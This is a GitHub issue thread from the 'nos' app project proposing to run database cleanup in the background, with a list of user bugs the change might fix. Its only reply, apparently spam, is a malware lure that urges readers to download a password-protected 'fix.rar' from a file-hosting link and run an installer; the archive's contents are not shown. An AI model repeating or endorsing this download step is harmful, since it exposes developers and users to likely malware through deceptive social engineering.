### ISSUE TITLE
Run database cleanup in the background

### ISSUE THREAD

**Issue by mplorentz** [planetary-social/nos#1426]
We have had a lot of bugs come from our `DatabaseCleaner` code which deletes a bunch of data on app startup to keep the database from growing too large. Let's change when the script runs to eliminate these bugs.

I have a hunch that this may help with some or all of these issues our users have been experiencing:
- content not loading
- duplicate notes in the feed [report](https://planetary-app.slack.com/archives/CM4EPK324/p1724094426340199)
- poor scroll performance
- reposts displaying as JSON

**Comment by marcosj046** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
